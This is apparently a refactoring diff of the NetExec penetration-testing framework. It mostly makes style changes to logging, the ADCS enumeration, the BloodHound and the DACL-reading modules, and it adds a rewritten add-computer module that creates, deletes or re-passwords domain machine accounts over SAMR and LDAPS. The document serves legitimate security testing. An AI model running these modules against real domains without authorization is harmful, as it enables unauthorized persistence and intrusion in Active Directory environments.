-                self.extra["module_name"] = self.extra["module_name"][:8] + "..."
+        if "module_name" in self.extra and len(self.extra["module_name"]) > 8:
+            self.extra["module_name"] = self.extra["module_name"][:8] + "..."

         # If the logger is being called when hooking the 'options' module function
-        if len(self.extra) == 1 and ("module_name" in self.extra.keys()):
+        if len(self.extra) == 1 and ("module_name" in self.extra):
             return (
                 f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
                 kwargs,
             )

         # If the logger is being called from nxcServer
-        if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()):
+        if len(self.extra) == 2 and ("module_name" in self.extra) and ("host" in self.extra):
            return (
                 f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
                 kwargs,
             )

         # If the logger is being called from a protocol
-        if "module_name" in self.extra.keys():
-            module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"])
-        else:
-            module_name = colored(self.extra["protocol"], "blue", attrs=["bold"])
+        module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"]) if "module_name" in self.extra else colored(self.extra["protocol"], "blue", attrs=["bold"])

         return (
             f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
|
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
|
||||||
|
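The format() override above keys entirely off the extra dict the adapter was built with. A reduced illustration of the same idea, using only the standard library and termcolor; the module name is made up, and for brevity this sketch uses the stock process() hook, whereas the adapter above deliberately overrides format() so that debug calls keep their raw message:

import logging
from termcolor import colored

logging.basicConfig(level=logging.INFO, format="%(message)s")

class PrefixAdapter(logging.LoggerAdapter):
    # Prepend a colored, width-padded prefix chosen from the extra dict,
    # truncating long module names the same way as above.
    def process(self, msg, kwargs):
        name = self.extra.get("module_name") or self.extra.get("protocol", "")
        if len(name) > 8:
            name = name[:8] + "..."
        return f"{colored(name, 'cyan', attrs=['bold']):<24} {msg}", kwargs

log = PrefixAdapter(logging.getLogger("demo"), {"module_name": "enum_shares"})
log.info("listing shares")  # prefix rendered as "enum_sha..."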
@@ -74,68 +66,38 @@ class NXCAdapter(logging.LoggerAdapter):
         )

     def display(self, msg, *args, **kwargs):
-        """
-        Display text to console, formatted for nxc
-        """
-        try:
-            if "protocol" in self.extra.keys() and not called_from_cmd_args():
-                return
-        except AttributeError:
-            pass
+        """Display text to console, formatted for nxc"""

         msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
         text = Text.from_ansi(msg)
         nxc_console.print(text, *args, **kwargs)
         self.log_console_to_file(text, *args, **kwargs)

-    def success(self, msg, color='green', *args, **kwargs):
-        """
-        Print some sort of success to the user
-        """
-        try:
-            if "protocol" in self.extra.keys() and not called_from_cmd_args():
-                return
-        except AttributeError:
-            pass
+    def success(self, msg, color="green", *args, **kwargs):
+        """Print some sort of success to the user"""

         msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
         text = Text.from_ansi(msg)
         nxc_console.print(text, *args, **kwargs)
         self.log_console_to_file(text, *args, **kwargs)

     def highlight(self, msg, *args, **kwargs):
-        """
-        Prints a completely yellow highlighted message to the user
-        """
-        try:
-            if "protocol" in self.extra.keys() and not called_from_cmd_args():
-                return
-        except AttributeError:
-            pass
+        """Prints a completely yellow highlighted message to the user"""

         msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
         text = Text.from_ansi(msg)
         nxc_console.print(text, *args, **kwargs)
         self.log_console_to_file(text, *args, **kwargs)

-    def fail(self, msg, color='red', *args, **kwargs):
-        """
-        Prints a failure (may or may not be an error) - e.g. login creds didn't work
-        """
-        try:
-            if "protocol" in self.extra.keys() and not called_from_cmd_args():
-                return
-        except AttributeError:
-            pass
+    def fail(self, msg, color="red", *args, **kwargs):
+        """Prints a failure (may or may not be an error) - e.g. login creds didn't work"""
         msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
         text = Text.from_ansi(msg)
         nxc_console.print(text, *args, **kwargs)
         self.log_console_to_file(text, *args, **kwargs)

     def log_console_to_file(self, text, *args, **kwargs):
-        """
+        """Log the console output to a file

         If debug or info logging is not enabled, we still want display/success/fail logged to the file specified,
-        so we create a custom LogRecord and pass it to all the additional handlers (which will be all the file handlers
+        so we create a custom LogRecord and pass it to all the additional handlers (which will be all the file handlers)
         """
         if self.logger.getEffectiveLevel() >= logging.INFO:
             # will be 0 if it's just the console output, so only do this if we actually have file loggers
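display/success/highlight/fail all follow the same pattern after this change: colorize a prefix with termcolor, convert the ANSI string to a rich Text, and print it on the shared console. A standalone sketch of that pattern; the console object here is a stand-in for nxc_console, not the repository's instance:

from rich.console import Console
from rich.text import Text
from termcolor import colored

console = Console()  # stand-in for nxc_console

def display(msg):
    # Same shape as NXCAdapter.display(): an ANSI-colored prefix, converted
    # to a rich Text so the console renders the colors it already contains.
    line = f"{colored('[*]', 'blue', attrs=['bold'])} {msg}"
    console.print(Text.from_ansi(line))

def fail(msg):
    console.print(Text.from_ansi(f"{colored('[-]', 'red', attrs=['bold'])} {msg}"))

display("starting enumeration")
fail("login failed")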
@@ -164,16 +126,16 @@ class NXCAdapter(logging.LoggerAdapter):
             file_creation = False

             if not os.path.isfile(output_file):
-                open(output_file, "x")
+                open(output_file, "x")  # noqa: SIM115
                 file_creation = True

             file_handler = RotatingFileHandler(output_file, maxBytes=100000)

             with file_handler._open() as f:
                 if file_creation:
-                    f.write("[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)))
+                    f.write(f"[{datetime.now().strftime('%d-%m-%Y %H:%M:%S')}]> {' '.join(sys.argv)}\n\n")
                 else:
-                    f.write("\n[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)))
+                    f.write(f"\n[{datetime.now().strftime('%d-%m-%Y %H:%M:%S')}]> {' '.join(sys.argv)}\n\n")

             file_handler.setFormatter(file_formatter)
             self.logger.addHandler(file_handler)

@@ -181,16 +143,15 @@ class NXCAdapter(logging.LoggerAdapter):

     @staticmethod
     def init_log_file():
-        newpath = os.path.expanduser("~/.nxc") + "/logs/" + datetime.now().strftime('%Y-%m-%d')
+        newpath = os.path.expanduser("~/.nxc") + "/logs/" + datetime.now().strftime("%Y-%m-%d")
         if not os.path.exists(newpath):
             os.makedirs(newpath)
-        log_filename = os.path.join(
+        return os.path.join(
             os.path.expanduser("~/.nxc"),
             "logs",
-            datetime.now().strftime('%Y-%m-%d'),
+            datetime.now().strftime("%Y-%m-%d"),
             f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log",
         )
-        return log_filename


 class TermEscapeCodeFormatter(logging.Formatter):

@@ -199,7 +160,7 @@ class TermEscapeCodeFormatter(logging.Formatter):
     def __init__(self, fmt=None, datefmt=None, style="%", validate=True):
         super().__init__(fmt, datefmt, style, validate)

-    def format(self, record):
+    def format(self, record):  # noqa: A003
         escape_re = re.compile(r"\x1b\[[0-9;]*m")
         record.msg = re.sub(escape_re, "", str(record.msg))
         return super().format(record)
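TermEscapeCodeFormatter exists so that ANSI color codes produced for the console never end up in log files. A small demonstration of the same regex on its own, with a made-up message:

import re
from termcolor import colored

ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;]*m")

colored_msg = colored("[+]", "green", attrs=["bold"]) + " Pwn3d!"
plain_msg = ANSI_ESCAPE.sub("", colored_msg)
print(repr(plain_msg))  # escape sequences stripped: '[+] Pwn3d!'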
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-

 class NXCModule:
     """

@@ -1,5 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 import re
 from impacket.ldap import ldap, ldapasn1
 from impacket.ldap.ldap import LDAPSearchError

@@ -40,23 +38,21 @@ class NXCModule:
             self.base_dn = module_options["BASE_DN"]

     def on_login(self, context, connection):
-        """
-        On a successful LDAP login we perform a search for all PKI Enrollment Server or Certificate Templates Names.
-        """
+        """On a successful LDAP login we perform a search for all PKI Enrollment Server or Certificate Templates Names."""
         if self.server is None:
             search_filter = "(objectClass=pKIEnrollmentService)"
         else:
             search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,"
-            self.context.log.highlight("Using PKI CN: {}".format(self.server))
+            self.context.log.highlight(f"Using PKI CN: {self.server}")

-        context.log.display("Starting LDAP search with search filter '{}'".format(search_filter))
+        context.log.display(f"Starting LDAP search with search filter '{search_filter}'")

         try:
             sc = ldap.SimplePagedResultsControl()
             base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn

             if self.server is None:
-                resp = connection.ldapConnection.search(
+                connection.ldapConnection.search(
                     searchFilter=search_filter,
                     attributes=[],
                     sizeLimit=0,

@@ -65,7 +61,7 @@ class NXCModule:
                     searchBase="CN=Configuration," + base_dn_root,
                 )
             else:
-                resp = connection.ldapConnection.search(
+                connection.ldapConnection.search(
                     searchFilter=search_filter + base_dn_root + ")",
                     attributes=["certificateTemplates"],
                     sizeLimit=0,

@@ -74,12 +70,10 @@ class NXCModule:
                     searchBase="CN=Configuration," + base_dn_root,
                 )
         except LDAPSearchError as e:
-            context.log.fail("Obtained unexpected exception: {}".format(str(e)))
+            context.log.fail(f"Obtained unexpected exception: {e}")

     def process_servers(self, item):
-        """
-        Function that is called to process the items obtain by the LDAP search when listing PKI Enrollment Servers.
-        """
+        """Function that is called to process the items obtain by the LDAP search when listing PKI Enrollment Servers."""
         if not isinstance(item, ldapasn1.SearchResultEntry):
             return

@@ -103,19 +97,17 @@ class NXCModule:
                     urls.append(match.group(1))
         except Exception as e:
             entry = host_name or "item"
-            self.context.log.fail("Skipping {}, cannot process LDAP entry due to error: '{}'".format(entry, str(e)))
+            self.context.log.fail(f"Skipping {entry}, cannot process LDAP entry due to error: '{e!s}'")

         if host_name:
-            self.context.log.highlight("Found PKI Enrollment Server: {}".format(host_name))
+            self.context.log.highlight(f"Found PKI Enrollment Server: {host_name}")
         if cn:
-            self.context.log.highlight("Found CN: {}".format(cn))
+            self.context.log.highlight(f"Found CN: {cn}")
         for url in urls:
-            self.context.log.highlight("Found PKI Enrollment WebService: {}".format(url))
+            self.context.log.highlight(f"Found PKI Enrollment WebService: {url}")

     def process_templates(self, item):
-        """
-        Function that is called to process the items obtain by the LDAP search when listing Certificate Templates Names for a specific PKI Enrollment Server.
-        """
+        """Function that is called to process the items obtain by the LDAP search when listing Certificate Templates Names for a specific PKI Enrollment Server."""
         if not isinstance(item, ldapasn1.SearchResultEntry):
             return

@@ -134,4 +126,4 @@ class NXCModule:

         if templates:
             for t in templates:
-                self.context.log.highlight("Found Certificate Template: {}".format(t))
+                self.context.log.highlight(f"Found Certificate Template: {t}")
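The adcs module above runs its paged search through impacket's LDAP connection. For illustration only, the same enumeration can be expressed with ldap3 against a hypothetical domain controller; the server name, base DN, and credentials below are placeholders and not part of the module:

import ldap3

# Hypothetical connection details, for illustration only.
server = ldap3.Server("dc01.example.local", get_info=ldap3.ALL)
conn = ldap3.Connection(server, user="EXAMPLE\\user", password="Passw0rd!", authentication=ldap3.NTLM, auto_bind=True)

# Same filter the module uses when no PKI CN is given: enrollment services
# live under the Configuration naming context.
base_dn = "CN=Configuration,DC=example,DC=local"
conn.search(base_dn, "(objectClass=pKIEnrollmentService)", attributes=["dNSHostName", "cn", "certificateTemplates"])
for entry in conn.entries:
    print(entry.cn, entry.dNSHostName)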
@@ -0,0 +1,305 @@ (new file)
import ssl
import ldap3
from impacket.dcerpc.v5 import samr, epm, transport
import sys


class NXCModule:
    """
    Module by CyberCelt: @Cyb3rC3lt
    Initial module:
      https://github.com/Cyb3rC3lt/CrackMapExec-Modules
    Thanks to the guys at impacket for the original code
    """

    name = "add-computer"
    description = "Adds or deletes a domain computer"
    supported_protocols = ["smb"]
    opsec_safe = True
    multiple_hosts = False

    def options(self, context, module_options):
        """
        add-computer: Specify add-computer to call the module using smb
        NAME: Specify the NAME option to name the Computer to be added
        PASSWORD: Specify the PASSWORD option to supply a password for the Computer to be added
        DELETE: Specify DELETE to remove a Computer
        CHANGEPW: Specify CHANGEPW to modify a Computer password
        Usage: nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password1"
               nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" DELETE=True
               nxc smb $DC-IP -u Username -p Password -M add-computer -o NAME="BADPC" PASSWORD="Password2" CHANGEPW=True
        """
        self.__baseDN = None
        self.__computerGroup = None
        self.__method = "SAMR"
        self.__noAdd = False
        self.__delete = False
        self.noLDAPRequired = False

        if "DELETE" in module_options:
            self.__delete = True

        if "CHANGEPW" in module_options and ("NAME" not in module_options or "PASSWORD" not in module_options):
            context.log.error("NAME and PASSWORD options are required!")
        elif "CHANGEPW" in module_options:
            self.__noAdd = True

        if "NAME" in module_options:
            self.__computerName = module_options["NAME"]
            if self.__computerName[-1] != "$":
                self.__computerName += "$"
        else:
            context.log.error("NAME option is required!")
            sys.exit(1)

        if "PASSWORD" in module_options:
            self.__computerPassword = module_options["PASSWORD"]
        elif "PASSWORD" not in module_options and not self.__delete:
            context.log.error("PASSWORD option is required!")
            sys.exit(1)

    def on_login(self, context, connection):
        self.__domain = connection.domain
        self.__domainNetbios = connection.domain
        self.__kdcHost = connection.hostname + "." + connection.domain
        self.__target = self.__kdcHost
        self.__username = connection.username
        self.__password = connection.password
        self.__targetIp = connection.host
        self.__port = context.smb_server_port
        self.__aesKey = context.aesKey
        self.__hashes = context.hash
        self.__doKerberos = connection.kerberos
        self.__nthash = ""
        self.__lmhash = ""

        if context.hash and ":" in context.hash[0]:
            hashList = context.hash[0].split(":")
            self.__nthash = hashList[-1]
            self.__lmhash = hashList[0]
        elif context.hash and ":" not in context.hash[0]:
            self.__nthash = context.hash[0]
            self.__lmhash = "00000000000000000000000000000000"

        # First try to add via SAMR over SMB
        self.do_samr_add(context)

        # If SAMR fails now try over LDAPS
        if not self.noLDAPRequired:
            self.do_ldaps_add(connection, context)
        else:
            sys.exit(1)

    def do_samr_add(self, context):
        """
        Connects to a target server and performs various operations related to adding or deleting machine accounts.

        Args:
        ----
            context (object): The context object.

        Returns:
        -------
            None
        """
        target = self.__targetIp or self.__target
        string_binding = epm.hept_map(target, samr.MSRPC_UUID_SAMR, protocol="ncacn_np")

        rpc_transport = transport.DCERPCTransportFactory(string_binding)
        rpc_transport.set_dport(self.__port)

        if self.__targetIp is not None:
            rpc_transport.setRemoteHost(self.__targetIp)
            rpc_transport.setRemoteName(self.__target)

        if hasattr(rpc_transport, "set_credentials"):
            # This method exists only for selected protocol sequences.
            rpc_transport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey)

        rpc_transport.set_kerberos(self.__doKerberos, self.__kdcHost)

        dce = rpc_transport.get_dce_rpc()
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)

        samr_connect_response = samr.hSamrConnect5(dce, f"\\\\{self.__target}\x00", samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN)
        serv_handle = samr_connect_response["ServerHandle"]

        samr_enum_response = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)
        domains = samr_enum_response["Buffer"]["Buffer"]
        domains_without_builtin = [domain for domain in domains if domain["Name"].lower() != "builtin"]
        if len(domains_without_builtin) > 1:
            domain = list(filter(lambda x: x["Name"].lower() == self.__domainNetbios, domains))
            if len(domain) != 1:
                context.log.highlight("{}".format('This domain does not exist: "' + self.__domainNetbios + '"'))
                context.log.highlight("Available domain(s):")
                for domain in domains:
                    context.log.highlight(f" * {domain['Name']}")
                raise Exception
            else:
                selected_domain = domain[0]["Name"]
        else:
            selected_domain = domains_without_builtin[0]["Name"]

        samr_lookup_domain_response = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected_domain)
        domain_sid = samr_lookup_domain_response["DomainId"]

        context.log.debug(f"Opening domain {selected_domain}...")
        samr_open_domain_response = samr.hSamrOpenDomain(dce, serv_handle, samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER, domain_sid)
        domain_handle = samr_open_domain_response["DomainHandle"]

        if self.__noAdd or self.__delete:
            try:
                check_for_user = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
            except samr.DCERPCSessionError as e:
                if e.error_code == 0xC0000073:
                    context.log.highlight(f"{self.__computerName} not found in domain {selected_domain}")
                    self.noLDAPRequired = True
                context.log.exception(e)

            user_rid = check_for_user["RelativeIds"]["Element"][0]
            if self.__delete:
                access = samr.DELETE
                message = "delete"
            else:
                access = samr.USER_FORCE_PASSWORD_CHANGE
                message = "set the password for"
            try:
                open_user = samr.hSamrOpenUser(dce, domain_handle, access, user_rid)
                user_handle = open_user["UserHandle"]
            except samr.DCERPCSessionError as e:
                if e.error_code == 0xC0000022:
                    context.log.highlight(f"{self.__username + ' does not have the right to ' + message + ' ' + self.__computerName}")
                    self.noLDAPRequired = True
                context.log.exception(e)
        else:
            if self.__computerName is not None:
                try:
                    samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
                    self.noLDAPRequired = True
                    context.log.highlight("{}".format('Computer account already exists with the name: "' + self.__computerName + '"'))
                    sys.exit(1)
                except samr.DCERPCSessionError as e:
                    if e.error_code != 0xC0000073:
                        raise
            else:
                found_unused = False
                while not found_unused:
                    self.__computerName = self.generateComputerName()
                    try:
                        samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
                    except samr.DCERPCSessionError as e:
                        if e.error_code == 0xC0000073:
                            found_unused = True
                        else:
                            raise
            try:
                create_user = samr.hSamrCreateUser2InDomain(
                    dce,
                    domain_handle,
                    self.__computerName,
                    samr.USER_WORKSTATION_TRUST_ACCOUNT,
                    samr.USER_FORCE_PASSWORD_CHANGE,
                )
                self.noLDAPRequired = True
                context.log.highlight('Successfully added the machine account: "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"')
            except samr.DCERPCSessionError as e:
                if e.error_code == 0xC0000022:
                    context.log.highlight("{}".format('The following user does not have the right to create a computer account: "' + self.__username + '"'))
                elif e.error_code == 0xC00002E7:
                    context.log.highlight("{}".format('The following user exceeded their machine account quota: "' + self.__username + '"'))
                context.log.exception(e)
            user_handle = create_user["UserHandle"]

        if self.__delete:
            samr.hSamrDeleteUser(dce, user_handle)
            context.log.highlight("{}".format('Successfully deleted the "' + self.__computerName + '" Computer account'))
            self.noLDAPRequired = True
            user_handle = None
        else:
            samr.hSamrSetPasswordInternal4New(dce, user_handle, self.__computerPassword)
            if self.__noAdd:
                context.log.highlight("{}".format('Successfully set the password of machine "' + self.__computerName + '" with password "' + self.__computerPassword + '"'))
                self.noLDAPRequired = True
            else:
                check_for_user = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.__computerName])
                user_rid = check_for_user["RelativeIds"]["Element"][0]
                open_user = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)
                user_handle = open_user["UserHandle"]
                req = samr.SAMPR_USER_INFO_BUFFER()
                req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
                req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                samr.hSamrSetInformationUser2(dce, user_handle, req)
                if not self.noLDAPRequired:
                    context.log.highlight("{}".format('Successfully added the machine account "' + self.__computerName + '" with Password: "' + self.__computerPassword + '"'))
                self.noLDAPRequired = True

        if user_handle is not None:
            samr.hSamrCloseHandle(dce, user_handle)
        if domain_handle is not None:
            samr.hSamrCloseHandle(dce, domain_handle)
        if serv_handle is not None:
            samr.hSamrCloseHandle(dce, serv_handle)
        dce.disconnect()

    def do_ldaps_add(self, connection, context):
        """
        Performs an LDAPS add operation.

        Args:
        ----
            connection (Connection): The LDAP connection object.
            context (Context): The context object.

        Returns:
        -------
            None

        Raises:
        ------
            None
        """
        ldap_domain = connection.domain.replace(".", ",dc=")
        spns = [
            f"HOST/{self.__computerName}",
            f"HOST/{self.__computerName}.{connection.domain}",
            f"RestrictedKrbHost/{self.__computerName}",
            f"RestrictedKrbHost/{self.__computerName}.{connection.domain}",
        ]
        ucd = {
            "dnsHostName": f"{self.__computerName}.{connection.domain}",
            "userAccountControl": 0x1000,
            "servicePrincipalName": spns,
            "sAMAccountName": self.__computerName,
            "unicodePwd": f"{self.__computerPassword}".encode("utf-16-le")
        }
        tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2, ciphers="ALL:@SECLEVEL=0")
        ldap_server = ldap3.Server(connection.host, use_ssl=True, port=636, get_info=ldap3.ALL, tls=tls)
        c = ldap3.Connection(ldap_server, f"{connection.username}@{connection.domain}", connection.password)
        c.bind()

        if self.__delete:
            result = c.delete(f"cn={self.__computerName},cn=Computers,dc={ldap_domain}")
            if result:
                context.log.highlight(f'Successfully deleted the "{self.__computerName}" Computer account')
            elif result is False and c.last_error == "noSuchObject":
                context.log.highlight(f'Computer named "{self.__computerName}" was not found')
            elif result is False and c.last_error == "insufficientAccessRights":
                context.log.highlight(f'Insufficient Access Rights to delete the Computer "{self.__computerName}"')
            else:
                context.log.highlight(f'Unable to delete the "{self.__computerName}" Computer account. The error was: {c.last_error}')
        else:
            result = c.add(
                f"cn={self.__computerName},cn=Computers,dc={ldap_domain}",
                ["top", "person", "organizationalPerson", "user", "computer"],
                ucd
            )
            if result:
                context.log.highlight(f'Successfully added the machine account: "{self.__computerName}" with Password: "{self.__computerPassword}"')
                context.log.highlight("You can try to verify this with the nxc command:")
                context.log.highlight(f"nxc ldap {connection.host} -u {connection.username} -p {connection.password} -M group-mem -o GROUP='Domain Computers'")
            elif result is False and c.last_error == "entryAlreadyExists":
                context.log.highlight(f"The Computer account '{self.__computerName}' already exists")
            elif not result:
                context.log.highlight(f"Unable to add the '{self.__computerName}' Computer account. The error was: {c.last_error}")
            c.unbind()
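One detail worth flagging about the unicodePwd value used in do_ldaps_add: Active Directory only accepts a unicodePwd that is the literal password wrapped in double quotes and then UTF-16-LE encoded, which is what the deleted implementation in the next hunk did with ('"%s"' % password).encode('utf-16-le'); whether the f-string in the rewritten ucd dict above is meant to carry those quotes is not clear from this view. A minimal sketch of the encoding rule in isolation, with a made-up password:

# Encoding rule for AD's unicodePwd attribute: the password, surrounded by
# double quotes, encoded as UTF-16-LE.
password = "Password1"          # made-up value
unicode_pwd = f'"{password}"'.encode("utf-16-le")
print(unicode_pwd[:8])          # b'"\x00P\x00a\x00s\x00'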
@@ -1,307 +0,0 @@ (previous add-computer module deleted)
[Removed: the pre-refactor add-computer module in its entirety — shebang/encoding header, camelCase doSAMRAdd/doLDAPSAdd methods wrapped in a try/except/finally around the SAMR calls, %-style and str.format() string building, logging.* calls instead of context.log, bare exit() instead of sys.exit(), an unqualified Connection() for the LDAPS bind, and a unicodePwd built as ('"%s"' % self.__computerPassword).encode('utf-16-le'). Its logic otherwise mirrors the rewritten module above.]
@@ -1,5 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
 # Author:
 #  Romain Bentz (pixis - @hackanddo)
 # Website:

@@ -33,7 +31,6 @@ class NXCModule:
         USER    Username for Neo4j database (default: 'neo4j')
         PASS    Password for Neo4j database (default: 'neo4j')
         """
-
         self.neo4j_URI = "127.0.0.1"
         self.neo4j_Port = "7687"
         self.neo4j_user = "neo4j"

@@ -49,10 +46,7 @@ class NXCModule:
             self.neo4j_pass = module_options["PASS"]

     def on_admin_login(self, context, connection):
-        if context.local_auth:
-            domain = connection.conn.getServerDNSDomainName()
-        else:
-            domain = connection.domain
+        domain = connection.conn.getServerDNSDomainName() if context.local_auth else connection.domain

         host_fqdn = f"{connection.hostname}.{domain}".upper()
         uri = f"bolt://{self.neo4j_URI}:{self.neo4j_Port}"

@@ -62,7 +56,7 @@ class NXCModule:
         try:
             driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False)
         except AuthError:
-            context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" " not valid. See --options")
+            context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are not valid. See --options")
             sys.exit()
         except ServiceUnavailable:
             context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options")

@@ -73,15 +67,21 @@ class NXCModule:
             sys.exit()

         with driver.session() as session:
-            with session.begin_transaction() as tx:
-                result = tx.run(f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' " c.name AS name")
-                record = result.single()
-                try:
-                    value = record.value()
-                except AttributeError:
-                    value = []
+            try:
+                with session.begin_transaction() as tx:
+                    result = tx.run(f"MATCH (c:Computer {{name:{host_fqdn}}}) SET c.owned=True RETURN c.name AS name")
+                    record = result.single()
+                    try:
+                        value = record.value()
+                    except AttributeError:
+                        value = []
+            except ServiceUnavailable as e:
+                context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options")
+                context.log.debug(f"Error {e}: ")
+                driver.close()
+                sys.exit()
         if len(value) > 0:
             context.log.success(f"Node {host_fqdn} successfully set as owned in BloodHound")
         else:
-            context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. Have you" " imported the correct data?")
+            context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. Have you imported the correct data?")
         driver.close()
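The rewritten Cypher string above interpolates host_fqdn directly into the query text. For illustration only, the neo4j Python driver also accepts query parameters, which sidesteps any quoting of the node name; the connection details mirror the module defaults shown above and the FQDN is made up:

from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://127.0.0.1:7687", auth=("neo4j", "neo4j"), encrypted=False)

host_fqdn = "WS01.EXAMPLE.LOCAL"  # made-up node name
with driver.session() as session:
    with session.begin_transaction() as tx:
        # $name is a Cypher parameter, bound server-side by the driver.
        result = tx.run("MATCH (c:Computer {name: $name}) SET c.owned = True RETURN c.name AS name", name=host_fqdn)
        record = result.single()
        print(record["name"] if record else "node not found")
        tx.commit()
driver.close()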
@@ -10,6 +10,7 @@ from nxc.helpers.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
 from ldap3.protocol.formatters.formatters import format_sid
 from ldap3.utils.conv import escape_filter_chars
 from ldap3.protocol.microsoft import security_descriptor_control
+import sys

 OBJECT_TYPES_GUID = {}
 OBJECT_TYPES_GUID.update(SCHEMA_OBJECTS)

@@ -64,7 +65,7 @@ WELL_KNOWN_SIDS = {
     "S-1-5-64-14": "SChannel Authentication",
     "S-1-5-64-21": "Digest Authority",
     "S-1-5-80": "NT Service",
-    "S-1-5-83-0": "NT VIRTUAL MACHINE\Virtual Machines",
+    "S-1-5-83-0": "NT VIRTUAL MACHINE\\Virtual Machines",
     "S-1-16-0": "Untrusted Mandatory Level",
     "S-1-16-4096": "Low Mandatory Level",
     "S-1-16-8192": "Medium Mandatory Level",

@@ -73,24 +74,24 @@ WELL_KNOWN_SIDS = {
[only change in this block: each single-backslash "BUILTIN\..." value is escaped to "BUILTIN\\..."; resolved content:]
     "S-1-16-16384": "System Mandatory Level",
     "S-1-16-20480": "Protected Process Mandatory Level",
     "S-1-16-28672": "Secure Process Mandatory Level",
     "S-1-5-32-554": "BUILTIN\\Pre-Windows 2000 Compatible Access",
     "S-1-5-32-555": "BUILTIN\\Remote Desktop Users",
     "S-1-5-32-557": "BUILTIN\\Incoming Forest Trust Builders",
     "S-1-5-32-556": "BUILTIN\\Network Configuration Operators",
     "S-1-5-32-558": "BUILTIN\\Performance Monitor Users",
     "S-1-5-32-559": "BUILTIN\\Performance Log Users",
     "S-1-5-32-560": "BUILTIN\\Windows Authorization Access Group",
     "S-1-5-32-561": "BUILTIN\\Terminal Server License Servers",
     "S-1-5-32-562": "BUILTIN\\Distributed COM Users",
     "S-1-5-32-569": "BUILTIN\\Cryptographic Operators",
     "S-1-5-32-573": "BUILTIN\\Event Log Readers",
     "S-1-5-32-574": "BUILTIN\\Certificate Service DCOM Access",
     "S-1-5-32-575": "BUILTIN\\RDS Remote Access Servers",
     "S-1-5-32-576": "BUILTIN\\RDS Endpoint Servers",
     "S-1-5-32-577": "BUILTIN\\RDS Management Servers",
     "S-1-5-32-578": "BUILTIN\\Hyper-V Administrators",
     "S-1-5-32-579": "BUILTIN\\Access Control Assistance Operators",
     "S-1-5-32-580": "BUILTIN\\Remote Management Users",
 }
@@ -188,15 +189,15 @@ class ALLOWED_OBJECT_ACE_MASK_FLAGS(Enum):


 class NXCModule:
-"""
+"""Module to read and backup the Discretionary Access Control List of one or multiple objects.
-Module to read and backup the Discretionary Access Control List of one or multiple objects.
 This module is essentially inspired from the dacledit.py script of Impacket that we have coauthored, @_nwodtuhs and me.
 It has been converted to an LDAPConnection session, and improvements on the filtering and the ability to specify multiple targets have been added.
 It could be interesting to implement the write/remove functions here, but a ldap3 session instead of a LDAPConnection one is required to write.
 """

 name = "daclread"
-description = "Read and backup the Discretionary Access Control List of objects. Based on the work of @_nwodtuhs and @BlWasp_. Be carefull, this module cannot read the DACLS recursively, more explains in the options."
+description = "Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options."
 supported_protocols = ["ldap"]
 opsec_safe = True
 multiple_hosts = False

@@ -207,29 +208,37 @@ class NXCModule:

 def options(self, context, module_options):
 """
-Be carefull, this module cannot read the DACLS recursively. For example, if an object has particular rights because it belongs to a group, the module will not be able to see it directly, you have to check the group rights manually.
+Be careful, this module cannot read the DACLS recursively.
